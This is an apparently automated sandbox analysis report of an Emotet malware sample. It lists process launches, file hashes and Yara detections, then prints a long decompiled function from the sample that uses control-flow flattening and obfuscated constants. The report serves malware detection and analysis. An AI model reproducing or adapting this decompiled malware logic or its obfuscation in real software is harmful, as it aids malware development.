Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.406595295.0000000000BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.406595295.0000000000BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.406684150.0000000000C21000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6968, Parent PID: 6908

General

Target ID:	4
Start time:	01:12:07
Start date:	20/07/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\6xfFjxyRXf.dll,DllRegisterServer
Imagebase:	0x1210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.406621589.00000000046B1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.406621589.00000000046B1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.406594585.0000000004680000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.406594585.0000000004680000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 7052, Parent PID: 6932

General

Target ID:	5
Start time:	01:12:12
Start date:	20/07/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Nrzawqzutwib\qenu.dlv"
Imagebase:	0x1d0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.917544011.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.917544011.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.917618972.0000000004481000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.917618972.0000000004481000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7068, Parent PID: 6908

General

Target ID:	6
Start time:	01:12:12
Start date:	20/07/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\6xfFjxyRXf.dll,DllUnregisterServerrrrrrrrrrrr
Imagebase:	0x1210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5776, Parent PID: 588

General

Target ID:	9
Start time:	01:12:26
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff726010000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 7048, Parent PID: 588

General

Target ID:	11
Start time:	01:12:43
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff726010000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 2764, Parent PID: 588

General

Target ID:	12
Start time:	01:12:49
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff726010000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 4348, Parent PID: 588

General

Target ID:	14
Start time:	01:13:08
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff726010000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 5764, Parent PID: 588

General

Target ID:	21
Start time:	01:14:07
Start date:	20/07/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff726010000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: regsvr32.exePID: 6932, Parent PID: 6908COMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	41.1%
Signature Coverage:	37.5%
Total number of Nodes:	360
Total number of Limit Nodes:	7

Executed Functions

Function 04F66C5E Relevance: 20.0, Strings: 15, Instructions: 1225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04F66C5E() {
				signed int _v20;
				char _v44;
				char _v56;
				signed int _v68;
				intOrPtr _v72;
				signed int _v80;
				signed int _v84;
				signed int _v92;
				signed int _v108;
				char _v124;
				signed int _v132;
				char _v140;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _t1172;
				signed int _t1177;
				void* _t1187;
				signed int _t1217;
				void* _t1248;
				signed int _t1312;
				signed int _t1317;
				signed int _t1342;
				signed int _t1358;
				signed int _t1362;
				signed int _t1368;
				signed int _t1373;
				signed int _t1375;
				signed int _t1376;
				signed int _t1377;
				signed int _t1378;
				signed int _t1379;
				signed int _t1380;
				signed int _t1382;
				signed int _t1383;
				signed int _t1389;
				signed int _t1390;
				signed int _t1391;
				signed int _t1392;
				signed int _t1393;
				signed int _t1396;
				signed int _t1397;
				signed int _t1398;
				signed int _t1400;
				signed int _t1402;
				signed int _t1403;
				signed int _t1404;
				signed int _t1405;
				signed int _t1408;
				signed int _t1411;
				signed int _t1412;
				signed int _t1414;
				signed int _t1415;
				signed int _t1416;
				signed int _t1421;
				signed int _t1422;
				signed int _t1424;
				signed int _t1425;
				void* _t1427;
				signed int _t1428;
				signed int _t1431;
				signed int _t1432;
				signed int _t1436;
				signed int _t1528;
				signed int _t1531;
				signed int _t1535;
				signed int _t1540;
				signed int _t1547;
				signed int _t1551;
				signed int _t1558;
				void* _t1560;
				void* _t1563;
				void* _t1564;
				void* _t1565;

				_t1560 = (_t1558 & 0xfffffff8) - 0xb8;
				_v180 = 0xc099;
				_t1531 = 0x1eb97;
				_t1373 = _v180;
				_t1528 = _v180;
				while(1) {
					_t1375 = 0xf;
					while(1) {
						L2:
						_t1563 = _t1531 - 0x8567c;
						if(_t1563 > 0) {
							break;
						}
						if(_t1563 == 0) {
							_v176 = 0x7f3767;
							_t1391 = 0x3d;
							_v176 = _v176 / _t1391;
							_t1392 = 0x7f;
							_v176 = _v176 / _t1392;
							_t1393 = 0x3f;
							_v176 = _v176 / _t1393;
							_v176 = _v176 ^ 0x000e09ad;
							_v184 = 0xfe5795;
							_v184 = _v184 + 0xffff462b;
							_v184 = _v184 >> 0xe;
							_v184 = _v184 ^ 0x9335f811;
							_v184 = _v184 ^ 0x93382792;
							_t1172 = E04F79C08(_v176,  &_v124, _v184);
							_t1531 = 0x236f5;
							while(1) {
								_t1375 = 0xf;
								goto L2;
							}
						}
						_t1564 = _t1531 - 0x4d228;
						if(_t1564 > 0) {
							__eflags = _t1531 - 0x75287;
							if(__eflags > 0) {
								__eflags = _t1531 - 0x7c4cd;
								if(_t1531 == 0x7c4cd) {
									_v180 = 0x67267b;
									_v180 = _v180 | 0x80ad4053;
									_v180 = _v180 ^ 0x80e21657;
									_v184 = 0xb9509e;
									_v184 = _v184 + 0xffff87ab;
									_v184 = _v184 + 0xbd1d;
									_v184 = _v184 + 0xf741;
									_v184 = _v184 ^ 0x00bd2dc3;
									_t1172 = E04F7E947();
									_t1531 = 0x68d11;
									while(1) {
										_t1375 = 0xf;
										goto L2;
									}
								}
								__eflags = _t1531 - 0x7cf16;
								if(_t1531 == 0x7cf16) {
									_v176 = 0x2ccf44;
									_v176 = _v176 | 0x2da5b876;
									_v176 = _v176 + 0xf82b;
									_t1396 = 0x1b;
									_v176 = _v176 / _t1396;
									_v176 = _v176 ^ 0x01b26cf5;
									_v184 = 0xe83fb2;
									_v184 = _v184 * 0x32;
									_v184 = _v184 >> 0xa;
									_v184 = _v184 | 0xbdaaff5c;
									_v184 = _v184 ^ 0xbda7d278;
									_t1172 = E04F69DE0();
									__eflags = _t1172;
									if(_t1172 == 0) {
										L117:
										return _t1172;
									}
									_t1531 = 0x4d228;
									while(1) {
										_t1375 = 0xf;
										goto L2;
									}
								}
								__eflags = _t1531 - 0x7df6e;
								if(_t1531 == 0x7df6e) {
									_v168 = 0x28da02;
									_v168 = _v168 + 0xffff248c;
									_v168 = _v168 >> 9;
									_t1397 = 0x54;
									_v168 = _v168 * 0x74;
									_v168 = _v168 ^ 0x000bdb0d;
									_v176 = 0x1d0560;
									_t1398 = 6;
									_v176 = _v176 / _t1397;
									_v176 = _v176 << 0xd;
									_v176 = _v176 << 3;
									_v176 = _v176 ^ 0x58760d8e;
									_v180 = 0xd729c2;
									_v180 = _v180 + 0xffff19f2;
									_v180 = _v180 ^ 0x00df11e1;
									_v184 = 0x8ac5b9;
									_v184 = _v184 + 0xb504;
									_v184 = _v184 / _t1398;
									_v184 = _v184 ^ 0x001ccc7e;
									_t1217 = E04F7001B( &_v56, _v168,  &_v140, _v176, _v180, _v184);
									_t1560 = _t1560 + 0x10;
									__eflags = _t1217;
									if(_t1217 != 0) {
										_t1172 = _v20;
										__eflags = _t1172 - 8;
										if(_t1172 != 8) {
											__eflags = _t1172;
											if(_t1172 == 0) {
												L52:
												_t1531 = 0xae85e;
												while(1) {
													_t1375 = 0xf;
													goto L2;
												}
											}
											__eflags = _t1172 - 1;
											if(_t1172 != 1) {
												L47:
												_t1531 = 0x90a26;
												while(1) {
													_t1375 = 0xf;
													goto L2;
												}
											}
											goto L52;
										}
										_t1531 = 0xccc39;
										while(1) {
											_t1375 = 0xf;
											goto L2;
										}
									}
									_v172 = 0xd4f412;
									_v172 = _v172 >> 3;
									_v172 = _v172 ^ 0x00133f2f;
									_v180 = 0x8eee0;
									_v180 = _v180 >> 6;
									_v180 = _v180 ^ 0x0008893f;
									_v176 = 0x6cef3c;
									_v176 = _v176 ^ 0xca5c407b;
									_v176 = _v176 >> 6;
									_v176 = _v176 << 2;
									_v176 = _v176 ^ 0x0ca4faaa;
									_v184 = 0xe39c2e;
									_v184 = _v184 ^ 0xba8f4b90;
									_t1362 = _v184;
									_t1400 = 0x31;
									_t1515 = _t1362 % _t1400;
									_push(_t1400);
									_v184 = _t1362 / _t1400;
									_v184 = _v184 * 0x56;
									_v184 = _v184 ^ 0x473c4c58;
									_v168 = 0x93d4a4;
									_v168 = _v168 | 0x8c330d06;
									_v168 = _v168 >> 3;
									_v168 = _v168 | 0xef9533c9;
									_t544 =  &_v168;
									 *_t544 = _v168 ^ 0xff998fdd;
									__eflags =  *_t544;
									_t1172 = E04F6F826(_v184, _t1400, _v168);
									_t1560 = _t1560 + 0xc;
									_t1528 = _t1172;
									_t1373 = 0x8567c;
									goto L47;
								}
								__eflags = _t1531 - 0x7f76f;
								if(_t1531 != 0x7f76f) {
									L112:
									__eflags = _t1531 - 0xbce8;
									if(_t1531 == 0xbce8) {
										goto L117;
									}
									while(1) {
										_t1375 = 0xf;
										goto L2;
									}
								}
								_v172 = 0xf80582;
								_t1402 = 0x67;
								_v172 = _v172 / _t1402;
								_v172 = _v172 ^ 0x000893ea;
								_v180 = 0xba8dc3;
								_t1403 = 0x49;
								_v180 = _v180 / _t1403;
								_v180 = _v180 ^ 0x000c33be;
								_t1172 = E04F7E5D0(); // executed
								_t1531 = 0xad75f;
								while(1) {
									_t1375 = 0xf;
									goto L2;
								}
							}
							if(__eflags == 0) {
								_v172 = 0x9752d1;
								_v172 = _v172 + 0xffff51ac;
								_v172 = _v172 ^ 0x00971d88;
								_v176 = 0x507dc3;
								_v176 = _v176 ^ 0x7941f889;
								_t1404 = 0x33;
								_v176 = _v176 / _t1404;
								_t1405 = 0x66;
								_v176 = _v176 * 0x76;
								_v176 = _v176 ^ 0x18194fff;
								_v184 = 0xce5bba;
								_v184 = _v184 >> 6;
								_v184 = _v184 >> 0xb;
								_v184 = _v184 ^ 0x00063927;
								_v180 = 0x7580d2;
								_v180 = _v180 / _t1405;
								_v180 = _v180 ^ 0x000c8d82;
								_push(_v180);
								_push( &_v152);
								_push(0x4f6150c);
								_push(_v184);
								_v156 = E04F62EF6(_v172, _v176);
								_v184 = 0xf8452e;
								_v184 = _v184 << 9;
								_v184 = _v184 ^ 0x745d9f96;
								_v184 = _v184 ^ 0x84dc6cdf;
								_v172 = 0xc45072;
								_v172 = _v172 + 0xffff6da4;
								_v172 = _v172 ^ 0x00cddae2;
								_v180 = 0x8d582e;
								_v180 = _v180 | 0x3bb5d4bf;
								_v180 = _v180 ^ 0x3bb26cf5;
								_v176 = 0x8946f3;
								_v176 = _v176 | 0xdf05946a;
								_v176 = _v176 + 0xe25a;
								_v176 = _v176 + 0xb407;
								_v176 = _v176 ^ 0xdf8cc94c;
								_push(_v176);
								_push( &_v160);
								_push(0x4f6156c);
								_push(_v180);
								_v164 = E04F62EF6(_v184, _v172);
								_v168 = 0x89b5b0;
								_v168 = _v168 ^ 0xcee2a950;
								_v168 = _v168 + 0xffffd23e;
								_v168 = _v168 ^ 0xce673e40;
								_v176 = 0x55e5f8;
								_t1408 = 0x5b;
								_v176 = _v176 * 0x22;
								_v176 = _v176 ^ 0x9dfeedd6;
								_v176 = _v176 ^ 0x96918ac0;
								_v180 = 0xa4b51d;
								_v180 = _v180 / _t1408;
								_v180 = _v180 ^ 0x000f5bb6;
								_v184 = 0xb6b55a;
								_v184 = _v184 >> 3;
								_v184 = _v184 ^ 0x68beed59;
								_v184 = _v184 ^ 0x68a85baf;
								E04F760FA( &_v164, _v176,  &_v156, _v180, _v184);
								_v180 = 0xfaf0be;
								asm("sbb esi, esi");
								_v180 = _v180 ^ 0xb5662764;
								_v180 = _v180 ^ 0xb59f494f;
								_v168 = 0xc9d7c7;
								_t1531 = (_t1531 & 0x000a03da) + 0xbce8;
								_v168 = _v168 + 0xb308;
								_v168 = _v168 * 0x37;
								_v168 = _v168 + 0xffff92b5;
								_v168 = _v168 ^ 0x2b873080;
								_v184 = 0xa52812;
								_v184 = _v184 | 0x01828696;
								_v184 = _v184 * 0x1e;
								_v184 = _v184 ^ 0x31a47b1e;
								_v176 = 0x1852ae;
								_v176 = _v176 * 0x3d;
								_v176 = _v176 + 0xffff82ba;
								_v176 = _v176 + 0x7a3a;
								_v176 = _v176 ^ 0x05c6c8d4;
								E04F6845B(_v180, _v168, _v184, _v176, _v164);
								_v176 = 0x6b4c2c;
								_v176 = _v176 >> 1;
								_t1411 = 0x27;
								_v176 = _v176 / _t1411;
								_v176 = _v176 << 0xa;
								_v176 = _v176 ^ 0x058463f4;
								_v172 = 0xa4e681;
								_v172 = _v172 << 2;
								_v172 = _v172 ^ 0x029060de;
								_v184 = 0x4c3b;
								_v184 = _v184 + 0x2e8c;
								_v184 = _v184 | 0xf754463a;
								_v184 = _v184 ^ 0xf757324c;
								_v180 = 0x96064d;
								_t1412 = 0x4d;
								_v180 = _v180 / _t1412;
								_v180 = _v180 ^ 0x00042ff4;
								_t1172 = E04F6845B(_v176, _v172, _v184, _v180, _v156);
								_t1560 = _t1560 + 0x48;
								goto L112;
							}
							__eflags = _t1531 - 0x58f63;
							if(_t1531 == 0x58f63) {
								_v184 = 0x8e14a3;
								_t1547 = 0x33;
								_v184 = _v184 / _t1547;
								_v184 = _v184 ^ 0xee36b40d;
								_v184 = _v184 ^ 0xee372a8f;
								_t1172 = E04F731FA();
								_v92 = _t1172;
								_t1531 = 0xea656;
								continue;
							}
							__eflags = _t1531 - 0x68d11;
							if(_t1531 == 0x68d11) {
								_v184 = 0x600fbb;
								_t1425 = 0x5b;
								_v184 = _v184 / _t1425;
								_v184 = _v184 ^ 0xb40d3b5e;
								_v184 = _v184 ^ 0xb40ba526;
								_t1172 = E04F6C26D(_v184 % _t1425);
								_t1531 = 0x75128;
								while(1) {
									_t1375 = 0xf;
									goto L2;
								}
							}
							__eflags = _t1531 - 0x7057a;
							if(_t1531 == 0x7057a) {
								_v180 = 0x617e57;
								_v180 = _v180 | 0xbd55f118;
								_v180 = _v180 ^ 0xbd7c2281;
								_v184 = 0x1bd871;
								_v184 = _v184 | 0xe6e7b4e1;
								_v184 = _v184 << 3;
								_v184 = _v184 ^ 0x37f95dca;
								_t1172 = E04F6D410();
								_t1531 = 0x9e5f1;
								while(1) {
									_t1375 = 0xf;
									goto L2;
								}
							}
							__eflags = _t1531 - 0x75128;
							if(_t1531 != 0x75128) {
								goto L112;
							}
							_v172 = 0x64d918;
							_v172 = _v172 + 0x6c6a;
							_v172 = _v172 ^ 0x006e4092;
							_v180 = 0x41c854;
							_v180 = _v180 * 0x54;
							_v180 = _v180 ^ 0x1591e018;
							_t1172 = E04F7202D();
							__eflags = _t1172;
							if(_t1172 == 0) {
								goto L117;
							}
							_t1531 = 0x86464;
							while(1) {
								_t1375 = 0xf;
								goto L2;
							}
						}
						if(_t1564 == 0) {
							_v184 = 0x92fc81;
							_v184 = _v184 ^ 0xfad19c83;
							_v184 = _v184 ^ 0x55bf21e2;
							_v184 = _v184 ^ 0xaff95575;
							_v176 = 0x73df0e;
							_v176 = _v176 << 0xa;
							_v176 = _v176 + 0xffff458e;
							_v176 = _v176 ^ 0x476a3dc5;
							_v176 = _v176 ^ 0x88163684;
							_t1172 = E04F69587();
							asm("sbb esi, esi");
							_t1531 = ( ~_t1172 & 0xfff7b846) + 0xed4cb;
							while(1) {
								_t1375 = 0xf;
								goto L2;
							}
						}
						_t1565 = _t1531 - 0x26342;
						if(_t1565 > 0) {
							__eflags = _t1531 - 0x2bef0;
							if(_t1531 == 0x2bef0) {
								_v180 = 0x6af14c;
								_v180 = _v180 >> 2;
								_t1414 = 0x21;
								_v180 = _v180 * 0x60;
								_v180 = _v180 ^ 0x0a04183e;
								_v184 = 0x265587;
								_v184 = _v184 / _t1414;
								_v184 = _v184 + 0xffffc71d;
								_v184 = _v184 << 2;
								_v184 = _v184 ^ 0x000ff409;
								_t1172 = E04F62C6B(_t1414);
								goto L117;
							}
							__eflags = _t1531 - 0x344b9;
							if(_t1531 == 0x344b9) {
								_v176 = 0xae9776;
								_v176 = _v176 ^ 0x11c2d44e;
								_v176 = _v176 * 0x44;
								_v176 = _v176 * 0x59;
								_v176 = _v176 ^ 0xe3624530;
								_t1172 = E04F64A11();
								_t1531 = 0x7057a;
								while(1) {
									_t1375 = 0xf;
									goto L2;
								}
							}
							__eflags = _t1531 - 0x40525;
							if(__eflags == 0) {
								_v176 = 0x48af3a;
								_v176 = _v176 ^ 0x06d056de;
								_t1415 = 0x22;
								_v176 = _v176 / _t1415;
								_v176 = _v176 + 0x67b9;
								_v176 = _v176 ^ 0x00340ea2;
								_t1172 = E04F74C70(_v176 % _t1415, __eflags);
								_v108 = _t1172;
								_t1531 = 0xd6604;
								while(1) {
									_t1375 = 0xf;
									goto L2;
								}
							}
							__eflags = _t1531 - 0x45316;
							if(_t1531 != 0x45316) {
								goto L112;
							}
							_v180 = 0x6b0d70;
							_t1416 = 0x27;
							_v180 = _v180 / _t1416;
							_v180 = _v180 ^ 0x000a0e53;
							_v72 = E04F6C267();
							_v184 = 0x3b27bb;
							_v184 = _v184 + 0xffff6a6d;
							_v184 = _v184 << 0x10;
							_v184 = _v184 ^ 0x922cc5c6;
							_v176 = 0xdfba50;
							_v176 = _v176 ^ 0xa07d5c24;
							_v176 = _v176 ^ 0xa0a2cc65;
							_v172 = 0xb06a61;
							_v172 = _v172 >> 0xf;
							_v172 = _v172 ^ 0x0006385c;
							_v180 = 0x65bbbc;
							_v180 = _v180 ^ 0xdedac25b;
							_v180 = _v180 ^ 0xdeba49a7;
							_t1172 = E04F68C07(_t1285, _v184, _v176, _v172, _v180);
							_t1560 = _t1560 + 0xc;
							_v68 = _t1172;
							_t1531 = 0x58f63;
							while(1) {
								_t1375 = 0xf;
								goto L2;
							}
						}
						if(_t1565 == 0) {
							_v172 = 0x37e0c0;
							_v172 = _v172 << 5;
							_v172 = _v172 ^ 0x06fd2538;
							_v176 = 0xce4bdd;
							_v176 = _v176 + 0xb899;
							_v176 = _v176 >> 3;
							_v176 = _v176 / _t1375;
							_v176 = _v176 ^ 0x000881a6;
							_v180 = 0x7c6ea4;
							_v180 = _v180 ^ 0x975889f3;
							_t121 =  &_v180;
							 *_t121 = _v180 ^ 0x972bb3b8;
							__eflags =  *_t121;
							_t1172 = E04F7E4B2(_v172, _v176,  *_t121, _v180, _v148);
							L19:
							_t1531 = 0xfff57;
							while(1) {
								_t1375 = 0xf;
								goto L2;
							}
						}
						if(_t1531 == 0x185f8) {
							_v168 = 0x1d3b58;
							_v168 = _v168 << 1;
							_t1551 = 0x15;
							_v168 = _v168 * 0x2f;
							_v168 = _v168 >> 0xb;
							_v168 = _v168 ^ 0x00080a59;
							_v176 = 0xd2ea86;
							_v176 = _v176 / _t1551;
							_v176 = _v176 >> 0xb;
							_v176 = _v176 + 0xffff6b77;
							_v176 = _v176 ^ 0xfff17360;
							_t1172 = E04F73622();
							__eflags = _t1172;
							if(_t1172 == 0) {
								_v168 = 0x3c62c4;
								_t1424 = 0x79;
								_v168 = _v168 * 0x35;
								_v168 = _v168 * 0x31;
								_v168 = _v168 >> 0xe;
								_v168 = _v168 ^ 0x00001073;
								_v176 = 0x7837fd;
								_v176 = _v176 / _t1551;
								_v176 = _v176 | 0xf11edf2b;
								_t1358 = _v176;
								_t1515 = _t1358 % _t1424;
								_v176 = _t1358 / _t1424;
								_t96 =  &_v176;
								 *_t96 = _v176 ^ 0x01fdddc1;
								__eflags =  *_t96;
								_t1172 = E04F7630A();
								_t1375 = 0xf;
							}
							_t1531 = 0x90a26;
							continue;
						}
						if(_t1531 == 0x1eb97) {
							_t1531 = 0xcbd7b;
							continue;
						}
						if(_t1531 == 0x231d2) {
							_v184 = 0x7cc28f;
							_v184 = _v184 ^ 0xb87757bd;
							_v184 = _v184 << 3;
							_v184 = _v184 ^ 0xc05a147a;
							_t1172 = E04F72FB9();
							_t1531 = 0x75287;
							while(1) {
								_t1375 = 0xf;
								goto L2;
							}
						}
						if(_t1531 != 0x236f5) {
							goto L112;
						}
						_v176 = 0xb54977;
						_v176 = _v176 << 0xe;
						_v176 = _v176 + 0x5acd;
						_v176 = _v176 << 0xc;
						_v176 = _v176 ^ 0xe1a0dba1;
						_v180 = 0x782373;
						_v180 = _v180 << 0xc;
						_v180 = _v180 ^ 0x823a69c8;
						_v168 = 0xa42dfe;
						_v168 = _v168 | 0x36cd084f;
						_t1421 = 0x76;
						_v168 = _v168 / _t1421;
						_t1422 = 0x6a;
						_v168 = _v168 / _t1422;
						_v168 = _v168 ^ 0x000f3a2f;
						_t1172 = E04F74093(_v176, _v180,  &_v132,  &_v148, _v168);
						_t1560 = _t1560 + 0xc;
						asm("sbb esi, esi");
						_t1531 = ( ~_t1172 & 0x000d5c42) + 0x26342;
						while(1) {
							_t1375 = 0xf;
							goto L2;
						}
					}
					__eflags = _t1531 - 0xcac93;
					if(__eflags > 0) {
						__eflags = _t1531 - 0xea656;
						if(__eflags > 0) {
							__eflags = _t1531 - 0xed4cb;
							if(_t1531 == 0xed4cb) {
								_v180 = 0xa7ae37;
								_t1376 = 0x38;
								_v180 = _v180 / _t1376;
								_v180 = _v180 ^ 0x00075762;
								_v184 = 0xbf9dbb;
								_v184 = _v184 | 0x577dc9ff;
								_v184 = _v184 + 0xffffa2bd;
								_v184 = _v184 ^ 0x57fce027;
								_t1177 = E04F7DC5F();
								__eflags = _t1177;
								if(_t1177 == 0) {
									_v172 = 0x7b47c;
									_t1377 = 0x73;
									_v172 = _v172 * 0x2f;
									_v172 = _v172 ^ 0x016f3300;
									_v180 = 0x400158;
									_t1378 = 0x1b;
									_v180 = _v180 / _t1377;
									_v180 = _v180 / _t1378;
									_v180 = _v180 ^ 0x0003f482;
									_t1172 = E04F73622();
									__eflags = _t1172;
									if(_t1172 == 0) {
										_t1531 = 0x7c4cd;
										goto L112;
									}
									_t1531 = 0xe0ef5;
									while(1) {
										_t1375 = 0xf;
										goto L2;
									}
								}
								_v172 = 0x85bca4;
								_v172 = _v172 + 0x3dba;
								_v172 = _v172 ^ 0x008e0a6c;
								_v180 = 0xd4d8c1;
								_t1368 = _v180;
								_t1379 = 0x18;
								_t1515 = _t1368 % _t1379;
								_v180 = _t1368 / _t1379;
								_v180 = _v180 << 0xa;
								_v180 = _v180 ^ 0x237dafa6;
								_t1172 = E04F73622();
								asm("sbb esi, esi");
								_t1535 =  ~_t1172 & 0xffffe6d6;
								L75:
								_t1531 = _t1535 + 0xcac93;
								while(1) {
									_t1375 = 0xf;
									goto L2;
								}
							}
							__eflags = _t1531 - 0xfbf84;
							if(_t1531 == 0xfbf84) {
								_v184 = 0x70cb4d;
								_v184 = _v184 << 6;
								_v184 = _v184 ^ 0x1448505d;
								_v184 = _v184 * 0x16;
								_v184 = _v184 ^ 0xba85dd47;
								_t1187 = E04F8047B();
								_v168 = 0x764708;
								_t1380 = 5;
								_v168 = _v168 / _t1380;
								_v168 = _v168 * 0x2c;
								_v168 = _v168 ^ 0x04100a24;
								_v176 = 0xc5ee9;
								_t1382 = 0x70;
								_v176 = _v176 * 0x36;
								_v176 = _v176 + 0x795c;
								_v176 = _v176 ^ 0x02981752;
								_v180 = 0xfcf570;
								_v180 = _v180 >> 0xe;
								_t1383 = 0xa;
								_v180 = _v180 / _t1382;
								_v180 = _v180 ^ 0x0005577e;
								_v184 = 0x2c2192;
								_v184 = _v184 >> 0x10;
								_v184 = _v184 >> 0xb;
								_v184 = _v184 << 2;
								_v184 = _v184 ^ 0x000a9549;
								_v172 = 0xf66190;
								_v172 = _v172 * 0x3d;
								_v172 = _v172 / _t1383;
								_v172 = _v172 ^ 0x05deecba;
								_t1172 = E04F61D5C(_v168, _v176,  &_v148,  &_v140, _t1187, _v172, _v180, _v184);
								_t1560 = _t1560 + 0x18;
								asm("sbb esi, esi");
								_t1531 = ( ~_t1172 & 0xfff81fea) + 0xfbf84;
								while(1) {
									_t1375 = 0xf;
									goto L2;
								}
							}
							__eflags = _t1531 - 0xfff57;
							if(_t1531 != 0xfff57) {
								goto L112;
							}
							__eflags = _t1528;
							if(_t1528 == 0) {
								L105:
								_t1531 = _t1373;
								goto L112;
							}
							_v184 = 0x362b;
							_v184 = _v184 >> 0xf;
							_v184 = _v184 << 0x10;
							_v184 = _v184 | 0xcd3867e2;
							_v184 = _v184 ^ 0xcd3d7a9a;
							_t1248 = E04F8047B();
							_v180 = 0xe692ef;
							_v180 = _v180 + 0xffff6162;
							_v180 = _v180 | 0xecf9e122;
							_v180 = _v180 ^ 0xecfdf471;
							_v184 = 0xeacb98;
							_t1540 = 0x33;
							_v184 = _v184 / _t1540;
							_v184 = _v184 * 0x47;
							_v184 = _v184 ^ 0x91ceb650;
							_v184 = _v184 ^ 0x90823711;
							_v172 = 0x48baa7;
							_v172 = _v172 | 0x18bd1d7b;
							_v172 = _v172 ^ 0x18f7b542;
							_t1172 = E04F7E2C3(_t1528, _v184, _t1248, _v172);
							__eflags = _t1172 - _v180;
							if(_t1172 == _v180) {
								_v184 = 0x3cdbca;
								_v184 = _v184 ^ 0xe8558184;
								_v184 = _v184 >> 0xf;
								_v184 = _v184 >> 0x10;
								_v184 = _v184 ^ 0x000d3105;
								_v180 = 0xe614;
								_t1389 = 0x41;
								_v180 = _v180 / _t1389;
								_v180 = _v180 >> 8;
								_t984 =  &_v180;
								 *_t984 = _v180 ^ 0x000c8b6e;
								__eflags =  *_t984;
								_t1172 = E04F7D8FE();
								goto L105;
							}
